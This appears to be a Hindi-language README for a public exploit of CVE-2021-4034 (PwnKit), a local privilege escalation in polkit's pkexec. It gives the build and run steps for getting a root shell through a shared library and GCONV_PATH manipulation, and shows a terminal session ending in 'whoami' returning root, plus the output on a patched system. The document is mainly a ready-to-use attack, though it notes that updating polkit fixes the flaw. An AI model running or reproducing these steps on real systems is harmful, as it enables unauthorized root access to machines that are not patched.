
CVE-2021-4034 के लिए एक्सप्लॉइट, polkit के pkexec में एक स्थानीय विशेषाधिकार वृद्धि, जो एक साझा लाइब्रेरी और GCONV_PATH हेरफेर के माध्यम से रूट शेल प्रदान करता है।
polkit विशेषाधिकार वृद्धि शोषण के लिए एक दिन
बस make, ./cve-2021-4034 चलाएँ और अपना रूट शेल प्राप्त करें।
वास्तविक लेखकों द्वारा मूल सलाह यहाँ है
यदि शोषण काम कर रहा है तो आपको तुरंत रूट शेल मिल जाएगा:
localuser@ubuntu-poc:~/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
localuser@ubuntu-poc:~/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# exit
अधिकांश सिस्टम पर polkit को अपडेट करने से शोषण पैच हो जाएगा, इसलिए आपको उपयोग मिलेगा और प्रोग्राम बाहर निकल जाएगा:
localuser@ubuntu-poc:~/CVE-2021-4034$ ./cve-2021-4034
pkexec --version |
--help |
--disable-internal-agent |
[--user username] PROGRAM [ARGUMENTS...]
See the pkexec manual page for more details.
localuser@ubuntu-poc:~/CVE-2021-4034$